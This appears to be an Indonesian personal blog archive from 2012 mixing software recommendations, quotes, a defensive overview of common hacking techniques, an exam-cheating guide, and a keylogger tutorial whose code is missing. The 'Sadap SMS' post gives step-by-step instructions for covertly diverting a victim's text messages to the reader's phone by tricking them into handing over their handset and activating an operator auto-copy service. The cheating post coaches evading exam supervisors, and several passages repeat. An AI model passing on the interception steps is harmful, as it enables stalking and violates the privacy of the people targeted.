Welcome To PeterJepiMars Blog
Senin, 30 April 2012
4 Software Speed Accelerators Terbaik Untuk Mempercepat Koneksi Internet (Full Version)
Koneksi internet lambat pasti membuat kamu kesal dan pusing, serasa pengen membanting modem kamu, tp itu gak mungkin karena modem yang kamu beli itu mahal hehehehe. Untuk alasan ini, untuk mengoptimalkan pengaturan hampir dianggap suatu keharusan – terutama sejak optimasi dalam hal kecepatan tidak datang dengan biaya tambahan, baik perpanjangan hardware atau untuk perangkat lunak, namun beberapa utilitas dapat men-tweak dan Internet mengoptimalkan pengaturan untuk kamu.
Berikut adalah beberapa utilitas yang bisa tuneup internet pengaturan yang sulit ditemukan di registry windows. kamu akan menemukan ini dan membantu dalam mengoptimalkan kecepatan internet kamu.
1. Ashampoo Internet Accelerator 3
Ashampoo Internet Accelerator analisis komputer kamu dan mengoptimalkan semua pengaturan yang terkait dengan satu klik.Kamu tidak perlu tahu apa-apa, cukup pilih pengoptimasi otomatis dan kamu sudah selesai. Ini juga termasuk koneksi internet berkecepatan alat tes sehingga kamu dapat menguji kinerja kamu secara langsung. Selain optimasi otomatis maju pengguna masih dapat mengakses semua individu dan menyesuaikan pengaturan secara manual untuk mempercepat internet.
Download
2. SpeedConnect
SpeedConnect Internet Accelerator adalah sebuah aplikasi Windows yang kuat dirancang untuk mengoptimalkan koneksi jaringan kamu dan mempercepat semua aktivitas internet kamu. Hal ini berarti koneksi internet lebih cepat, lebih cepat browsing dan email, download yang lebih cepat, lebih cepat game online, meningkatkan koneksi Skype. Datang dengan kedua versi bayar dan gratis. Untuk men-download versi gratis klik link yang diberikan di kanan atas dari situs resmi.
Download
3. Internet Accelerator
Internet Accelerator meningkatkan berbagai pengaturan konfigurasi yang secara langsung mempengaruhi jaringan kamu dan kecepatan koneksi internet. Ini menawarkan sejumlah fitur yang terbatas tapi untuk pemula setting ini cukup untuk melihat kecepatan koneksi internet.
Download
4. TCP Optimizer
TCP Optimizer adalah gratis, mudah Windows program yang menyediakan antarmuka intuitif untuk tuning dan mengoptimalkan koneksi Internet kamu. Tidak ada diperlukan instalasi, hanya men-download dan menjalankan. Program ini dapat membantu baik pemula dan pengguna advance dalam mengutak-atik terkait TCP / IP parameter dalam Windows Registry, sehingga mudah untuk menyempurnakan sistem kamu dengan jenis koneksi internet yang digunakan.
Download
Sumber : http://alltech.web.id/4-software-speed-accelerators-terbaik-untuk-mempercepat-koneksi-internet-full-version/
Minggu, 29 April 2012
Sadap SMS melalui Hape Biasa
Sekarang sudah ada cara
sadap/mengalihkan panggilan, sms, telepon, pembicaraan private bahkan
BBM juga bisa disadap. Kalau kamu ingin tahu cara menyadap dengan cara
mudah, kamu cukup punya handphone biasa saja. Dengan handphone biasa
ini, kamu dapat menyadap sms orang lain tanpa aplikasi apa pun yang
diinstal. Langsung saja, saya berbagi trik sadap sms dengan menggunakan
trik operator selular.
Bagi kamu para pengguna operator selular XL, kamu sangat beruntung. Karena dengan menggunakan operator ini, kamu dapat melakukan penyadapan secara sederhana. Dan kamu dapat membaca petunjuk berikut ini.
Bagi kamu para pengguna operator selular XL, kamu sangat beruntung. Karena dengan menggunakan operator ini, kamu dapat melakukan penyadapan secara sederhana. Dan kamu dapat membaca petunjuk berikut ini.
1. Siapkan gadget orang yang ingin kamu sadap. ( Agak dirayu dikit untuk mendapatkan gadgetnya )
2. Ketik *123*571# di gadget korban, lalu kamu tekan CALL.
3. Setelah itu kamu akan mendapat beberapa pilihan, jadi kamu pilih no 2 ( Layanan Lain )
4. Dari pilihan tadi, akan muncul 2 pilihan baru, yaitu :
- AUTO FORWARD => Menerima SMS orang lain langsung tanpa masuk ke no HP korban.
- AUTO COPY => Menerima SMS orang lain yang masuk ke no HP korban dan juga ke no HP kamu sendiri.
5. Setelah itu, kamu pilih yang AUTO COPY, agar kamu dapat mengetahui
lebih detail lagi tanpa ketahuan. Dan kemudian, kamu tungggu konfirmasi
dari operator XL untuk pemotongan biaya ( 1000/ bulan )
6. Lalu kamu mengirim sms dari HP korban dengan format : COPY ON lalu kirim ke no HP kamu. Maka proses sadap SMS sudah berhasil.
OK, Selamat mencoba.
http://life.xl.co.id/layanan/index.do
Jumat, 27 April 2012
10 Kalimat Inspiratif ‘Steve Jobs’
Sosok legendaris di ranah teknologi, Steve Jobs, telah meninggal dunia di usianya yang ke-56. Akan tetapi, jejak kesuksesannya tidak akan pernah dilupakan.
Kesuksesan yang ia raih bersama Apple ini tidak luput dari cara Jobs memandang kehidupan serta bisnis yang ia jalani. Ia pun sering berbagi kalimat penuh inspirasi. Berikut beberapa di antaranya:
1. “Sangat sulit membuat desain sebuah produk. Kerap kali orang-orang tidak mengetahui apa yang mereka inginkan, sampai kita menunjukkannya pada mereka”. (BussinessWeek, 1998).
2. “Ini adalah salah satu mantra saya – fokus dan kesederhanaan. Kamu harus berkerja lebih keras untuk menjernihkan pikiran dan menghasilkan kesederhanaan. Pada akhirnya hal ini akan setimpal. Saat kamu tiba di sana, kamu bisa memindahkan gunung”. (BusinessWeek, 1998).
3. “Menjadi orang terkaya di pemakaman tidak berarti bagi saya…Pergi ke tempat tidur dan mengatakan bahwa kami telah melakukan sesuatu yang luar biasa…Itulah yang berarti bagi saya”. (The Wall Street Journal, 1993).
4. “Saya akan selalu terhubung dengan Apple. Mungkin ada saat-saat atau tahun-tahun di mana saya tidak di sini, namun saya akan selalu kembali”. (Playboy, 1985).
5. “Kami tidak pernah khawatir terhadap angka-angka. Apple selalu mencoba berfokus pada produk karena sebuah produk benar-benar akan membuat perbedaan”. (Playboy, 1985).
6. “Kamu harus memiliki keyakinan terhadap sesuatu – keinginan, takdir, hidup, karma, apapun itu”. (Stanford commencement speech, 2005).
7. “Pekerjaanmu akan menjadi bagian penting dari kehidupanmu. Satu-satunya cara untuk mencapai kepuasan adalah dengan percaya bahwa apa yang kamu kerjakan adalah pekerjaan yang hebat. Cintai apa yang kamu kerjakan. Jika kamu belum menemukannya, tetaplah cari. Jangan berhenti”. (Stanford commencement speech, 2005).
8. “Tidak ada seorang pun yang ingin mati. Meski mereka yang ingin pergi ke surga, tidak ingin mati. Namun kematian adalah tujuan kita bersama, tidak ada yang bisa lolos darinya. Kematian adalah penemuan terbaik dalam kehidupan. Ia membersihkan yang lama dan membuat jalan untuk yang baru. Sekarang yang baru adalah kamu, namun suatu saat nanti kamu akan menjadi tua dan ‘dibersihkan’. Maaf terlalu dramatik, namun ini benar”. (Stanford commencement speech, 2005).
9. “Panutan saya untuk bisnis adalah The Beatles. Mereka saling mengimbangi satu sama lain. Beginilah cara saya memandang suatu bisnis, bisnis yang hebat bukan dilakukan oleh satu orang, melainkan oleh tim”. (Interview with 60 Minutes, 2003).
10. “Jika kamu melakukan sesuatu yang bagus, maka selanjutnya kamu harus melakukan hal lain yang luar biasa. Jangan tinggal terlalu lama, pikirkan apa yang harus kamu buat selanjutnya”. (NBC Nightly News, May 2006).
Sumber: http://alltech.web.id/10-kalimat-inspiratif-steve-jobs/
Related posts: 12 Kalimat Inspiratif Bill Gates (13.4)
Selasa, 24 April 2012
Waspadai Kejahatan Hackers Ancam “Keamanan” Anda
Aktifitas hackers (*sesungguhnya yang saya maksudkan adalah crackers,
tapi media massa telah salah mempopulerkannya*) adalah nyata dan
menjadi ancaman serius yang terus menerus berkembang serta dapat
mengganggu kegiatan bisnis. Mereka masuk dalam sistem internal
perusahaan melalui sambungan internet / LAN atau kegiatan secara fisik
lainnya yang memungkinkan mereka terhubung ke terminal komputer.
Berikut disampaikan secara umum beberapa tehnik yang biasa dipakai hackers untuk mendapatkan akses ilegal ke sumber daya komputer.
A. Mencuri akses log-in yang dipakai
Untuk melakukan akses ilegal ke dalam sistem komputer salah satunya adalah dengan mendapatkan akses log-in yang dipakai. Hal ini bisa dilakukan ketika hacker secara fisik berada di dekat fasilitas komputer atau berusaha mengakses sistem melalui koneksi dial-in.
1. Mencuri akses secara fisik : tahap penting dalam menjaga keamanan sistem informasi adalah menjamin bahwa akses secara fisik ke sumber daya komputer adalah terbatas. Orang dalam atau luar yang secara fisik mempunyai akses ke terminal komputer akan memiliki kesempatan mendapatkan log-in yang sedang digunakan.
2. Mendapatkan akses melalui dial-in : metode lain untuk mendapatkan akses log-in adalah dengan melakukan dial-in ke host. Program “daemon dialers”, yang banyak tersedia di internet, dapat mengidentifikasi ID modem yang sedang berlaku. Sekali hackers mengetahui ID modem suatu terminal/host, dia dapat melakukan dial-in dan mendapatkan akses log-in yang dipakai.
Untuk meminimalisir potensi pelanggaran akses log-in ini dapat dilakukan langkah-langkah :
- Terminal komputer diletakkan (secara fisik) ditempat yang aman;
- Pengamanan dan pengendalian akses yang baik dipasang pada semua jendela dan pintu tempat dimana hardware komputer berada;
- Komputer yang diletakkan diluar area yang diamankan dan terhubung ke jaringan perusahaan, harus menggunakan password yang baik;
- Mematikan modem ketika tidak digunakan;
- Menggunakan fasilitas call-back, memberikan ekstra otentikasi, atau menggunakan one-time password;
- Menghilangkan logo dan nama organisasi dari layar log-in untuk menghilangkan tanda pengenal, sehingga hackers tidak dapat mengetahui dengan cepat sistem mana yang dimasuki;
- Menggunakan alarm atau pesan peringatan saat pihak yang tidak berhak memasuki sistem dan mencatat aktifitasnya.
B. Mencuri password
Beberpa tehnik yang populer untuk mencuri password adalah :
1. Brute Force Attacks : merupakan usaha menebak password baik secara manual ataupun otomatis. Umumnya hackers memiliki daftar password yang berisi koleksi password default yang terpasang secara otomatis saat suatu program diinstal. Program penebak password banyak tersedia juga di internet.
2. Password cracking : merupakan program untuk mendapatkan password dengan memanfaatkan celah keamanan. Program ini banyak tersedia di internet, misalnya program Crack. Crack bekerja dengan cara menyandi kamus standar dan kemudian membandingkannya dengan password yang disandi oleh sistem sampai menemukan kata-kata yang cocok.
Untuk menghindari pencurian password dapat dilakukan langkah-langkah :
- Mem-password semua user account;
- Ganti default password segera setelah instal program;
- Gunakan kata-kata / frasa yang sukar ditebak;
- Ganti password secara periodik;
- User account yang sudah tidak terpakai segera dihapus;
- Password yang telah disandi disimpan dalam file yang terlindung dengan baik (disamarkan);
- Jangan menuliskan password didekat terminal komputer / work station;
- Usahakan hanya sedikit orang yang memiliki akses terhadap sistem administrator, untuk menghindari resiko peng-copy-an password yang sedang digunakan;
- Memberikan pengertian kepada user akan pentingnya mengelola, menjaga keamanan password yang dimiliki.
3. Keystroke logging : tehnik ini sangat sederhana dan hampir selalu tidak terdeteksi. Hackers dapat menggunakan sebuah disket untuk menginstal program key-stroke logging melalui work-station. Sekali program ini masuk ke dalam sistem, dia akan menetap di dalam sistem dan menangkap setiap sign-on berdasarkan kata kunci pembukanya. Hacker dapat memanfaatkan sign-on yang tertangkap tersebut dari jauh (remote location).
Untuk mencegah aksi ini :
- Gunakan one-time password untuk sign-on pada account dengan tingkat sensitif tinggi;
- Secara periodik lakukan scanning untuk mengetahui trojan atau malware lain yang terlanjur masuk kedalam sistem;
- Tempatkan hardware komputer di tempat yang terlindung dan diberi pembatasan akses.
4. Packet sniffing : program-program network monitoring tools seperti network analyzers dan packet sniffers tersedia sangat banyak di internet. Tool ini bekerja dengan cara menangkap paket data yang ditransmisikan melalui saluran komunikasi. Terkadang hacker juga melakukan packet sniffer dengan cara menghubungkan laptopnya ke port jaringan perusahaan, baru kemudian melakukan pencurian data.
Lalu-lintas data dalam jaringan hampir dapat dipastikan tidak dibungkus dengan metode penyandian yang baik, sehingga merupakan kesempatan emas bagi hacker untuk mendapatkan user account dan password yang ada di dalam jaringan.
Untuk mencegah dan meminimalisir akibat aksi packet sniffer :
- Jalur komunikasi sedapat mungkin dibagi dalam beberapa bagian;
- Data-data sensitif ditransmisikan melalui jaringan komunikasi dalam bentuk yang sudah disandi dengan metode penyandian yang baik;
- Menggunakan one-time password untuk sign-on pada account dengan tingkat yang sensitif;
- Akses kepada saluran komunikasi dan komputer, secara fisik dibatasi.
5. Social engineering : interaksi sosial yang mengabaikan keamanan informasi menjadi salah satu cara hackers untuk mendapatkan data sensitif secara langsung ataupun tidak langsung dari user.
Untuk mencegah kebocoran informasi melalui kegiatan ini :
- Secara periodik dilakukan penyegaran dan sosialisasi pentingnya menjaga keamanan informasi yang dimiliki;
- Melakukan pencatatan dan dokumentasi atas semua prosedur pengendalian akses;
- Membangun kesadaran pengamanan informasi di seluruh staf baik manajemen maupun operasional;
- Waspada terhadap pesan tipuan yang berisi “permintaan konfirmasi password”, “reset password” atau “lupa password”.
C. Metode lainnya untuk mencuri akses
1. IP address spoofing : adalah salah satu cara pengelabuan yang membuat untrusted host terlihat seperti trusted host dalam sebuah jaringan. Hal ini terjadi karena hackers merubah IP address host tersebut sehingga menyerupai trusted host. Dengan kata lain penyusup menipu host dalam jaringan sehingga penyusup tersebut tidak perlu melakukan otentikasi untuk dapat terhubung dengan jaringan lokal.
Untuk menangkal serangan ini dilakukan :
- Mengkonfigurasi firewall dan router sedemikian rupa agar dapat menangkal serangan IP spoofing;
- Hanya host yang dinyatakan aman yang diijinkan untuk terhubung ke dalam jaringan.
2. Terminal yang tidak dijaga : sering terjadi sebuah terminal dalam keadaan sign-on ditinggalkan oleh user, entah ke toilet atau istirahat makan. Bila kebetulan ada hacker yang secara fisik berada di tempat tersebut, maka hacker akan mempunyai kesempatan untuk mengakses data secara ilegal atau memasukkan trojan ke dalam sistem.
Untuk meminimalisir kejadian tersebut :
- Gunakan screen server yang dipasangi password, yang otomatis dijalankan setelah beberapa menit tidak ada aktifitas dalam sistem;
- Memberi pengertian pada user untuk selalu melakukan sign-off setiap kali meninggalkan terminal;
- Melakukan pengawasan ditempat dimana terminal tersebut berada.
3. Writeable set user ID files : beberapa sistem menyediakan sebuah file penyimpan user ID untuk mengakses terminal. Hacker akan mencari file yang diidentifikasikan sebagai set-user-ID (SUID) tersebut dan mencoba menuliskan kode tambahan kedalam SUID agar mendapatkan akses menuju root.
Untuk mencegah penyusupan ini :
- Dilakukan pembatasan terhadap program yang dapat mengakses SUID;
- SUID dikonfigurasikan sedemikian rupa sehingga hanya dapat diubah melalui root;
- Hanya user yang terdaftar dalam sistem yang dapat menulis di file SUID.
4. Laporan dari Computer Emergency Response Team (CERT) : CERT selalu memberikan laporan-laporan tentang celah keamanan yang teridentifikasi. Namun eksploitasi ini sering dimanfaatkan oleh pihak yang bermaksud jahat untuk mendapatkan keuntungan dengan memasuki sistem secara ilegal. Hackers selalu mengikuti laporan CERT ini untuk mengidentifikasi bugs baru dari suatu sistem.
Administrator jaringan dan profesional keamanan informasi perlu mengikuti dengan cermat laporan-laporan CERT, melakukan checksum untuk menguji hasil-hasil yang dilaporkan CERT sebelum diimplementasikan dan melakukan penutupan celah keamanan yang teridentifikasi.
5. Hackers bulletin board : hackers dari seluruh dunia saling bertukar informasi dalam internet melalui forum atau milis dan bahkan menerbitkan laporan/tulisan dalam buletin. Mereka membahas masalah celah keamanan, keamanan sistem informasi, berbagi tehnik dan program baru, atau bahkan membahas informasi sensitif milik organisasi tertentu.
Administrator dan profesional keamanan jaringan perlu juga secara teratur mengikuti perkembangan pembahasan di forum hackers, dengan tujuan memperkuat sistem keamanan informasi dalam organisasinya.
6. Software di internet : internet banyak sekali menyediakan program/tools yang dapat digunakan oleh administrator untuk membantu melindungi komputer dan membantu melakukan scanning celah keamanan. Namun tool tersebut juga dipakai para hacker untuk maksud yang sebaliknya.
Administrator jaringan perlu secara teratur melakukan audit terhadap sistemnya. Audit ini dapat dilakukan secara internal ataupun melalui konsultan independen. Selain itu secara reguler administrator perlu mengecek versi terakhir dari tool yang digunakan untuk membantu keamanan sistem. Serta pastikan setiap celah keamanan yang ditemukan telah diatasi dengan baik. SUMBER : http://cakrawalainterprize.com/2010/12/25/waspadai-kejahatan-hackers-ancam-%E2%80%9Ckeamanan%E2%80%9D-anda/
Berikut disampaikan secara umum beberapa tehnik yang biasa dipakai hackers untuk mendapatkan akses ilegal ke sumber daya komputer.
A. Mencuri akses log-in yang dipakai
Untuk melakukan akses ilegal ke dalam sistem komputer salah satunya adalah dengan mendapatkan akses log-in yang dipakai. Hal ini bisa dilakukan ketika hacker secara fisik berada di dekat fasilitas komputer atau berusaha mengakses sistem melalui koneksi dial-in.
1. Mencuri akses secara fisik : tahap penting dalam menjaga keamanan sistem informasi adalah menjamin bahwa akses secara fisik ke sumber daya komputer adalah terbatas. Orang dalam atau luar yang secara fisik mempunyai akses ke terminal komputer akan memiliki kesempatan mendapatkan log-in yang sedang digunakan.
2. Mendapatkan akses melalui dial-in : metode lain untuk mendapatkan akses log-in adalah dengan melakukan dial-in ke host. Program “daemon dialers”, yang banyak tersedia di internet, dapat mengidentifikasi ID modem yang sedang berlaku. Sekali hackers mengetahui ID modem suatu terminal/host, dia dapat melakukan dial-in dan mendapatkan akses log-in yang dipakai.
Untuk meminimalisir potensi pelanggaran akses log-in ini dapat dilakukan langkah-langkah :
- Terminal komputer diletakkan (secara fisik) ditempat yang aman;
- Pengamanan dan pengendalian akses yang baik dipasang pada semua jendela dan pintu tempat dimana hardware komputer berada;
- Komputer yang diletakkan diluar area yang diamankan dan terhubung ke jaringan perusahaan, harus menggunakan password yang baik;
- Mematikan modem ketika tidak digunakan;
- Menggunakan fasilitas call-back, memberikan ekstra otentikasi, atau menggunakan one-time password;
- Menghilangkan logo dan nama organisasi dari layar log-in untuk menghilangkan tanda pengenal, sehingga hackers tidak dapat mengetahui dengan cepat sistem mana yang dimasuki;
- Menggunakan alarm atau pesan peringatan saat pihak yang tidak berhak memasuki sistem dan mencatat aktifitasnya.
B. Mencuri password
Beberpa tehnik yang populer untuk mencuri password adalah :
1. Brute Force Attacks : merupakan usaha menebak password baik secara manual ataupun otomatis. Umumnya hackers memiliki daftar password yang berisi koleksi password default yang terpasang secara otomatis saat suatu program diinstal. Program penebak password banyak tersedia juga di internet.
2. Password cracking : merupakan program untuk mendapatkan password dengan memanfaatkan celah keamanan. Program ini banyak tersedia di internet, misalnya program Crack. Crack bekerja dengan cara menyandi kamus standar dan kemudian membandingkannya dengan password yang disandi oleh sistem sampai menemukan kata-kata yang cocok.
Untuk menghindari pencurian password dapat dilakukan langkah-langkah :
- Mem-password semua user account;
- Ganti default password segera setelah instal program;
- Gunakan kata-kata / frasa yang sukar ditebak;
- Ganti password secara periodik;
- User account yang sudah tidak terpakai segera dihapus;
- Password yang telah disandi disimpan dalam file yang terlindung dengan baik (disamarkan);
- Jangan menuliskan password didekat terminal komputer / work station;
- Usahakan hanya sedikit orang yang memiliki akses terhadap sistem administrator, untuk menghindari resiko peng-copy-an password yang sedang digunakan;
- Memberikan pengertian kepada user akan pentingnya mengelola, menjaga keamanan password yang dimiliki.
3. Keystroke logging : tehnik ini sangat sederhana dan hampir selalu tidak terdeteksi. Hackers dapat menggunakan sebuah disket untuk menginstal program key-stroke logging melalui work-station. Sekali program ini masuk ke dalam sistem, dia akan menetap di dalam sistem dan menangkap setiap sign-on berdasarkan kata kunci pembukanya. Hacker dapat memanfaatkan sign-on yang tertangkap tersebut dari jauh (remote location).
Untuk mencegah aksi ini :
- Gunakan one-time password untuk sign-on pada account dengan tingkat sensitif tinggi;
- Secara periodik lakukan scanning untuk mengetahui trojan atau malware lain yang terlanjur masuk kedalam sistem;
- Tempatkan hardware komputer di tempat yang terlindung dan diberi pembatasan akses.
4. Packet sniffing : program-program network monitoring tools seperti network analyzers dan packet sniffers tersedia sangat banyak di internet. Tool ini bekerja dengan cara menangkap paket data yang ditransmisikan melalui saluran komunikasi. Terkadang hacker juga melakukan packet sniffer dengan cara menghubungkan laptopnya ke port jaringan perusahaan, baru kemudian melakukan pencurian data.
Lalu-lintas data dalam jaringan hampir dapat dipastikan tidak dibungkus dengan metode penyandian yang baik, sehingga merupakan kesempatan emas bagi hacker untuk mendapatkan user account dan password yang ada di dalam jaringan.
Untuk mencegah dan meminimalisir akibat aksi packet sniffer :
- Jalur komunikasi sedapat mungkin dibagi dalam beberapa bagian;
- Data-data sensitif ditransmisikan melalui jaringan komunikasi dalam bentuk yang sudah disandi dengan metode penyandian yang baik;
- Menggunakan one-time password untuk sign-on pada account dengan tingkat yang sensitif;
- Akses kepada saluran komunikasi dan komputer, secara fisik dibatasi.
5. Social engineering : interaksi sosial yang mengabaikan keamanan informasi menjadi salah satu cara hackers untuk mendapatkan data sensitif secara langsung ataupun tidak langsung dari user.
Untuk mencegah kebocoran informasi melalui kegiatan ini :
- Secara periodik dilakukan penyegaran dan sosialisasi pentingnya menjaga keamanan informasi yang dimiliki;
- Melakukan pencatatan dan dokumentasi atas semua prosedur pengendalian akses;
- Membangun kesadaran pengamanan informasi di seluruh staf baik manajemen maupun operasional;
- Waspada terhadap pesan tipuan yang berisi “permintaan konfirmasi password”, “reset password” atau “lupa password”.
C. Metode lainnya untuk mencuri akses
1. IP address spoofing : adalah salah satu cara pengelabuan yang membuat untrusted host terlihat seperti trusted host dalam sebuah jaringan. Hal ini terjadi karena hackers merubah IP address host tersebut sehingga menyerupai trusted host. Dengan kata lain penyusup menipu host dalam jaringan sehingga penyusup tersebut tidak perlu melakukan otentikasi untuk dapat terhubung dengan jaringan lokal.
Untuk menangkal serangan ini dilakukan :
- Mengkonfigurasi firewall dan router sedemikian rupa agar dapat menangkal serangan IP spoofing;
- Hanya host yang dinyatakan aman yang diijinkan untuk terhubung ke dalam jaringan.
2. Terminal yang tidak dijaga : sering terjadi sebuah terminal dalam keadaan sign-on ditinggalkan oleh user, entah ke toilet atau istirahat makan. Bila kebetulan ada hacker yang secara fisik berada di tempat tersebut, maka hacker akan mempunyai kesempatan untuk mengakses data secara ilegal atau memasukkan trojan ke dalam sistem.
Untuk meminimalisir kejadian tersebut :
- Gunakan screen server yang dipasangi password, yang otomatis dijalankan setelah beberapa menit tidak ada aktifitas dalam sistem;
- Memberi pengertian pada user untuk selalu melakukan sign-off setiap kali meninggalkan terminal;
- Melakukan pengawasan ditempat dimana terminal tersebut berada.
3. Writeable set user ID files : beberapa sistem menyediakan sebuah file penyimpan user ID untuk mengakses terminal. Hacker akan mencari file yang diidentifikasikan sebagai set-user-ID (SUID) tersebut dan mencoba menuliskan kode tambahan kedalam SUID agar mendapatkan akses menuju root.
Untuk mencegah penyusupan ini :
- Dilakukan pembatasan terhadap program yang dapat mengakses SUID;
- SUID dikonfigurasikan sedemikian rupa sehingga hanya dapat diubah melalui root;
- Hanya user yang terdaftar dalam sistem yang dapat menulis di file SUID.
4. Laporan dari Computer Emergency Response Team (CERT) : CERT selalu memberikan laporan-laporan tentang celah keamanan yang teridentifikasi. Namun eksploitasi ini sering dimanfaatkan oleh pihak yang bermaksud jahat untuk mendapatkan keuntungan dengan memasuki sistem secara ilegal. Hackers selalu mengikuti laporan CERT ini untuk mengidentifikasi bugs baru dari suatu sistem.
Administrator jaringan dan profesional keamanan informasi perlu mengikuti dengan cermat laporan-laporan CERT, melakukan checksum untuk menguji hasil-hasil yang dilaporkan CERT sebelum diimplementasikan dan melakukan penutupan celah keamanan yang teridentifikasi.
5. Hackers bulletin board : hackers dari seluruh dunia saling bertukar informasi dalam internet melalui forum atau milis dan bahkan menerbitkan laporan/tulisan dalam buletin. Mereka membahas masalah celah keamanan, keamanan sistem informasi, berbagi tehnik dan program baru, atau bahkan membahas informasi sensitif milik organisasi tertentu.
Administrator dan profesional keamanan jaringan perlu juga secara teratur mengikuti perkembangan pembahasan di forum hackers, dengan tujuan memperkuat sistem keamanan informasi dalam organisasinya.
6. Software di internet : internet banyak sekali menyediakan program/tools yang dapat digunakan oleh administrator untuk membantu melindungi komputer dan membantu melakukan scanning celah keamanan. Namun tool tersebut juga dipakai para hacker untuk maksud yang sebaliknya.
Administrator jaringan perlu secara teratur melakukan audit terhadap sistemnya. Audit ini dapat dilakukan secara internal ataupun melalui konsultan independen. Selain itu secara reguler administrator perlu mengecek versi terakhir dari tool yang digunakan untuk membantu keamanan sistem. Serta pastikan setiap celah keamanan yang ditemukan telah diatasi dengan baik. SUMBER : http://cakrawalainterprize.com/2010/12/25/waspadai-kejahatan-hackers-ancam-%E2%80%9Ckeamanan%E2%80%9D-anda/
Domain Gratis Dot Com
Buat temen-temen yang ingin menggunakan domain dot com tapi terbentur dana yang minim,, kaya saya ini, hehehe
saya punya info bagus ni, ada sebuah web yang menyediakan domain secara geratis tapi minim persyaratan, menurut saya sih, hehehe
soalnya syarat nya cuma,
mencari referal sebanyak 9 orang dan kita akan diberikan domain nya,
berikut rincian gambar nya,
Pendaftaran nya juga gak ribet kok, bagi yang berniat bisa mendaftar Disini
saya punya info bagus ni, ada sebuah web yang menyediakan domain secara geratis tapi minim persyaratan, menurut saya sih, hehehe
soalnya syarat nya cuma,
mencari referal sebanyak 9 orang dan kita akan diberikan domain nya,
berikut rincian gambar nya,
Pendaftaran nya juga gak ribet kok, bagi yang berniat bisa mendaftar Disini
Sabtu, 21 April 2012
Tips Jitu Mencontek Saat Ujian
sebelum kita ulas mengenai cara-cara mencontek yang baik dan benar, alangkah baiknya kalo kita telaah dulu jenis-jenis mencontek. Menurut jenisnya, tipe mencontek itu ada 3:
A. Contek diam-diam
Dalam kasus ini, pelaku pencontek cenderung mencontek kerjaan temennya yang pinter. Tapi sering juga karena kepepet, temen yang bodoh pun tetep dicontekin. Dalam contek tipe, korban yang diconteki (biasanya) tidak sadar telah dicontek…
B. Kerja sama
Contek jenis cenderung lebih menyenangkan. Karena dilakukan oleh 2 kepala (atau lebih), ujian jadi (terasa) lebih ringan…
C. Solo career
Contek jenis ini biasanya lebih menjanjikan, tapi kalo resiko kalo ketauan lebih bahaya, karena si pelaku contek bakal bunya barang bukti mencontek…hahaha!
Nah, sekarang mari kita ulas tips-tips mencontek yang baik dan benar….
1. Behave. Be calm. Be confident
Kalo kamu mau mencontek, usahakan gesture tubuh kamu jangan terlalu mencolok. Karena kalo kamu-nya udah salah tingkah duluan, misal: keringet dingin, dijamin si pengawas ujian bakal curiga.
2. Hindari eye-contact dengan pengawas ujian
Saya kasih tau ya, peserta ujian yang sering terlibat eye-contact dengan pengawas cenderung langsung dinobatkan sebagai calon pencontek. Jadinya sebisa mungkin hindari eye-contact. Cara yang paling baik adalah pura-pura ngeliat jam dinding di depan ruangan, sambil sesekali melirik si pengawas ujian. Sebisa mungkin gesture-nya se-natural mungkin.Terus, kalo kamu terlibat eye-contact dengan sang pengawas, kamu ga usah panik. Cara yang paling ampuh adalah langsung berpura-pura mikir, bisa dengan sambil bergumam & sok-sok mikirin teorema/dalil dari mata kuliah yang bersangkutan….hahaha!
3. Hindari posisi duduk miring
Biasanya ini terjadi kalo kamu mau mencontek temen kamu yang duduknya di belakang kamu. Posisi duduk miring emang memudahkan manuver mencontek ke belakang, tapi sayangnya posisi seperti ini sangat mencurigakan. Jadi lebih baik dihindari.
4. Jangan bawa alat tulis komplit
Kalo perlu, kamu mending ga usah bawa pulpen. Logikanya begini, semakin banyak barang yang kamu ngga bawa, berarti semakin banyak juga kesempatan kamu minjem barang ke temen, berarti semakin banyak juga peluang untuk mencontek temen yang kita pinjem barangnya….hahahaha! Saat pinjem barang, usahakan mata ga usah melihat barang yang kita pinjem, tapi fokus pada kertas jawaban target yang akan dicontek.
5. Jangan pernah buat contekan di kartu ujian
Sumpah, ini cara yang paling dongo’ banget! Saya suka mau teriak kalo nemuin kebetan mahasiswa di kartu ujiannya….! Agh!
6. Buat kebetan di kertas kecil
Jangan pernah serakah dalam membuat kebetan! Kalo memang sifat ujiannya close book, ya buat kebetannya di kertas kecil aja. Jangan buat kebetan di kertas A4!
7. Mencontek saat di awal
Kerjakanlah soal yang paling susah dulu! Ini wajib! Karena kalo ujiannya baru dimulai, cenderung pengawas ujian masih ngga fokus, jadinya chance untuk mencontek juga lebih besar…. Coba bandingin dengan momen-momen akhir ujian. Biasanya mahasiswa udah keburu panik kalo waktu ujiannya tiggal dikit. Jadinya ngga bisa mencontek dengan pikiran jernih….hahahaha!
8. Ke toilet
Ini adalah senjata pamungkas dalam urusan contek-mencontek (khususnya kalo selama ujian, peserta diperbolehkan untuk ke toilet). Sebelum pergi ke toilet, alangkah baiknya kamu hapalin dulu soal-soal apa aja yang ngga bisa kamu jawab, baru deh ntar di dalam toilet, kamu bebas membaca kertas kebetan kamu sepuasnya! Haahahaha!
Nutrilon Royal 2012 'Life Starts Here'
Lets call on the interested The wide eyed The hopeful The princesses And the princes Their believer Lets some.. on the generals The queens, The kings, and The knights start ride adventures trail Lets call on The ledgers The lovers The big ones The small ones the boundaries The attendance Discoverers The conductor The scientist The CEO’s lets call on the Sky walkers The movers The shakers Lets call on the curious And bring on the hope LIFE STARTS HERENieee Videonya
Jumat, 20 April 2012
Post to All Friends and Groups in One Click
Source: Aing Creations
Published: Karak ge crot bieu
Source: Aing Creations
Published: Karak ge crot bieu
Post to All Groups
Post to All Friends
Just a minute :)
Load
Harus pake ID Aplikasi punya sendiri,, kalo enggak, gak bisa posting banyak..
Yang penting setting Site Domain Aplikasi ke blogspot.com sama Site URL ke alamat blog blogspot misal http://aing-creations.blogspot.com
Have fun.. :)
Show Error Console
Hide
Error Console
Kamis, 19 April 2012
Tutorial Membuat Keylogger (Bukan Untuk Kejahatan)
Sesuai
dengan judul di atas, kali ini saya akan memberikan sedikit tutorial
cara membuat key logger sederhana dengan Visual Basic. JANGAN DIGUNAKAN BERLEBIHAN
1. Siapkan Visual Basic , Disini saya menggunakan Visual Basic 6.0
2. Buka program Visual Basic
3. New Project Standard EXE
4. Tambahkan 1 buah TextBox, 4 buah CommandButton, 2 Timer, dan 6 buah Label (Lihat Gambar)
5. Copas seluruh Code di bawah ini :
6. Jalankan dengan menekan tombol F5
Live demo bisa di download disini :
JANGAN DIGUNAKAN BERLEBIHAN
1. Siapkan Visual Basic , Disini saya menggunakan Visual Basic 6.0
2. Buka program Visual Basic
3. New Project Standard EXE
